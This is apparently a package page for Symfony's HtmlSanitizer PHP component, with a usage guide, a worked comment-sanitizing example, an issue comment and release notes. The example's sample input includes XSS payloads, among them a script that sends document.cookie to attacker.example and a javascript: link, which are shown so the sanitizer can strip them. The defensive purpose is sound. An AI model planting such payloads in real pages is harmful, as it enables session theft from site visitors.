Html-sanitizer - The HtmlSanitizer component provides an object-oriented API to sanitize untrusted HTML input for safe insertion into a document's DOM.

Overview

HtmlSanitizer Component

The HtmlSanitizer component provides an object-oriented API to sanitize untrusted HTML input for safe insertion into a document's DOM.

Usage

use Symfony\Component\HtmlSanitizer\HtmlSanitizerConfig;
use Symfony\Component\HtmlSanitizer\HtmlSanitizer;

// By default, an element not added to the allowed or blocked elements
// will be dropped, including its children
$config = (new HtmlSanitizerConfig())
    // Allow "safe" elements and attributes. All scripts will be removed
    // as well as other dangerous behaviors like CSS injection
    ->allowSafeElements()

    // Allow all static elements and attributes from the W3C Sanitizer API
    // standard. All scripts will be removed but the output may still contain
    // other dangerous behaviors like CSS injection (click-jacking), CSS
    // expressions, ... Prefer allowSafeElements() unless you need this wider set
    ->allowStaticElements()

    // Allow the "div" element with no attributes on it
    ->allowElement('div')

    // Allow the "a" element, and the "title" attribute to be on it
    ->allowElement('a', ['title'])

    // Allow the "span" element, and any attribute from the Sanitizer API is allowed
    // (see https://wicg.github.io/sanitizer-api/#default-configuration)
    ->allowElement('span', '*')

    // Block the "section" element: this element will be removed but
    // its children will be retained
    ->blockElement('section')

    // Drop the "div" element: this element will be removed, including its children
    ->dropElement('div')

    // Allow the attribute "title" on the "div" element
    ->allowAttribute('title', ['div'])

    // Allow the attribute "data-custom-attr" on all currently allowed elements
    ->allowAttribute('data-custom-attr', '*')

    // Drop the "data-custom-attr" attribute from the "div" element:
    // this attribute will be removed
    ->dropAttribute('data-custom-attr', ['div'])

    // Drop the "data-custom-attr" attribute from all elements:
    // this attribute will be removed
    ->dropAttribute('data-custom-attr', '*')

    // Forcefully set the value of all "rel" attributes on "a"
    // elements to "noopener noreferrer"
    ->forceAttribute('a', 'rel', 'noopener noreferrer')

    // Transform all HTTP schemes to HTTPS
    ->forceHttpsUrls()

    // Configure which schemes are allowed in links (others will be dropped)
    ->allowLinkSchemes(['https', 'http', 'mailto'])

    // Configure which hosts are allowed in links (by default all are allowed)
    ->allowLinkHosts(['symfony.com', 'example.com'])

    // Allow relative URLs in links (by default they are dropped)
    ->allowRelativeLinks()

    // Configure which schemes are allowed in img/audio/video/iframe (others will be dropped)
    ->allowMediaSchemes(['https', 'http'])

    // Configure which hosts are allowed in img/audio/video/iframe (by default all are allowed)
    ->allowMediaHosts(['symfony.com', 'example.com'])

    // Allow relative URLs in img/audio/video/iframe (by default they are dropped)
    ->allowRelativeMedias()

    // Configure a custom attribute sanitizer to apply custom sanitization logic
    // ($attributeSanitizer instance of AttributeSanitizerInterface)
    ->withAttributeSanitizer($attributeSanitizer)

    // Unregister a previously registered attribute sanitizer
    // ($attributeSanitizer instance of AttributeSanitizerInterface)
    ->withoutAttributeSanitizer($attributeSanitizer)
;

$sanitizer = new HtmlSanitizer($config);

// Sanitize a given string, using the configuration provided and in the
// "body" context (tags only allowed in <head> will be removed)
$sanitizer->sanitize($userInput);

// Sanitize the given string for a usage in a <head> tag
$sanitizer->sanitizeFor('head', $userInput);

// Sanitize the given string for a usage in another tag
$sanitizer->sanitizeFor('title', $userInput); // Will encode as HTML entities
$sanitizer->sanitizeFor('textarea', $userInput); // Will encode as HTML entities
$sanitizer->sanitizeFor('div', $userInput); // Will sanitize as body
$sanitizer->sanitizeFor('section', $userInput); // Will sanitize as body
// ...
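The chain above lists every configuration method but is not a profile you would ship (it allows and then drops "div", for instance). The following is an added example, not code from the component's README, that builds a profile for user comments with the same API and shows the extension point the list only names: a custom AttributeSanitizerInterface. The class ClassAllowlistSanitizer, the functions buildCommentSanitizer() and sanitizeComment(), the host cdn.example.com, the class names and the sample input are assumptions made for this example; the component methods are the ones documented above.

```php
<?php
// Added example, not part of symfony/html-sanitizer. Class, function and host
// names below are assumptions; the HtmlSanitizerConfig/HtmlSanitizer calls are
// the component's own API.

require __DIR__.'/vendor/autoload.php'; // assumes: composer require symfony/html-sanitizer

use Symfony\Component\HtmlSanitizer\HtmlSanitizer;
use Symfony\Component\HtmlSanitizer\HtmlSanitizerConfig;
use Symfony\Component\HtmlSanitizer\Visitor\AttributeSanitizer\AttributeSanitizerInterface;

/**
 * Hypothetical attribute sanitizer: keeps only allow-listed class names in a
 * "class" attribute and removes the attribute when nothing survives.
 * Attribute sanitizers run after the element/attribute allow-list, so this
 * only ever sees attributes the configuration has already accepted.
 */
final class ClassAllowlistSanitizer implements AttributeSanitizerInterface
{
    /** @param list<string> $allowedClasses */
    public function __construct(private array $allowedClasses)
    {
    }

    // Returning null here would mean "every element"; restrict it instead.
    public function getSupportedElements(): ?array
    {
        return ['p', 'span', 'code'];
    }

    public function getSupportedAttributes(): ?array
    {
        return ['class'];
    }

    public function sanitizeAttribute(string $element, string $attribute, string $value, HtmlSanitizerConfig $config): ?string
    {
        $classes = preg_split('/\s+/', trim($value), -1, PREG_SPLIT_NO_EMPTY) ?: [];
        $kept = array_values(array_intersect($classes, $this->allowedClasses));

        // A null return drops the attribute from the output entirely.
        return $kept ? implode(' ', $kept) : null;
    }
}

function buildCommentSanitizer(): HtmlSanitizer
{
    $config = (new HtmlSanitizerConfig())
        // Start from the curated "safe" subset, not allowStaticElements()
        ->allowSafeElements()
        // Grant "class" only where the custom sanitizer polices it
        ->allowAttribute('class', ['p', 'span', 'code'])
        // Links: web and mail schemes only; http is accepted, then rewritten to https
        ->allowLinkSchemes(['https', 'http', 'mailto'])
        ->forceHttpsUrls()
        ->allowRelativeLinks()
        ->forceAttribute('a', 'rel', 'noopener noreferrer')
        // Media: https only, and only from a host we control (assumed name)
        ->allowMediaSchemes(['https'])
        ->allowMediaHosts(['cdn.example.com'])
        ->withAttributeSanitizer(new ClassAllowlistSanitizer(['highlight', 'muted']))
    ;

    return new HtmlSanitizer($config);
}

function sanitizeComment(HtmlSanitizer $sanitizer, string $rawComment): string
{
    // Body context: the result is safe to echo inside <body>, not inside an
    // attribute value, <script> or <style>.
    return $sanitizer->sanitize($rawComment);
}

// Constructed input: legitimate markup mixed with the payloads the profile
// is meant to neutralise.
$rawComment = <<<'HTML'
<p class="muted evil">Hi <span class="highlight" onclick="alert(1)">there</span></p>
<a href="javascript:alert(document.cookie)">click me</a>
<a href="http://example.com/page">article</a>
<img src="https://attacker.example/track.gif" alt="x">
<script>fetch('https://attacker.example/?c=' + document.cookie)</script>
HTML;

$sanitizer = buildCommentSanitizer();
echo sanitizeComment($sanitizer, $rawComment), PHP_EOL;
```

By construction of this profile, the "evil" class name and the onclick handler do not reach the output, the javascript: href is removed because its scheme is not in allowLinkSchemes(), the http:// link is rewritten to https:// and gets the forced rel attribute, the tracking image's src points at a host outside allowMediaHosts() and is removed, and the script element is dropped with its contents. Two points worth keeping in mind: an attribute sanitizer cannot widen what the configuration allows, only narrow or rewrite it, so put the allow-list in the config and the value-level policy in the sanitizer; and sanitize() targets the body context, so if the same string must go into a title or textarea use sanitizeFor() as shown above rather than reusing the body output.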

Resources

Comments
  • [HtmlSanitizer] maxInputLength can be disabled

    I have very long html because of base64 encoded images. Using $config->withMaxInputLength(strlen($content)) is useless. Using $config->withMaxInputLength(null) to turn off the check is a better alternative.

    opened by MartkCz 1
Releases(v6.2.2)
  • v6.2.2(Dec 16, 2022)

    Changelog (https://github.com/symfony/html-sanitizer/compare/v6.2.1...v6.2.2)

    • bug #48602 Fix HtmlSanitizer default configuration behavior for allowed schemes (Titouan Galopin)
  • v6.2.0(Nov 30, 2022)

  • v6.2.0-RC1(Nov 25, 2022)

  • v6.2.0-BETA1(Oct 24, 2022)

  • v6.1.0(May 27, 2022)

  • v6.1.0-RC1(May 14, 2022)

    Changelog (https://github.com/symfony/html-sanitizer/compare/v6.1.0-BETA2...v6.1.0-RC1)

    • bug #46274 Fix node renderer handling of self-closing (void) elements (omniError)
  • v6.1.0-BETA2(Apr 27, 2022)

  • v6.1.0-BETA1(Apr 15, 2022)

    Changelog (https://github.com/symfony/html-sanitizer/compare/v6.0.7...v6.1.0-BETA1)

    • feature #45377 Bump minimum version of PHP to 8.1 (nicolas-grekas)
    • feature #44681 Introduce HtmlSanitizer component (tgalopin)